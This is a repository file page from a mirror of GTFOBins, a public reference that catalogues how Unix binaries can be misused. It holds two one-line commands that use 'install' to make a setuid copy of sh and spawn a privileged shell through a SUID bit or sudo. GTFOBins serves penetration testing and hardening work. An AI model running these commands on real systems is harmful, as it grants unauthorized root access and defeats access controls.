This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
de10e4761e05be39fc1b4aa4ade51b862c038f44
GTFOBins.github.io
/
_gtfobins
/
install.md
Emanuel Duss
de10e4761e
Added missing shell file
2020-11-13 12:09:04 +01:00
218 B
Raw
Blame
History
functions
functions
suid
sudo
code
TF=$(mktemp) install -m 4755 `which sh` $TF $TF -p
code
TF=$(mktemp) sudo install -m 4755 `which sh` $TF $TF -p
Reference in New Issue
View Git Blame
Copy Permalink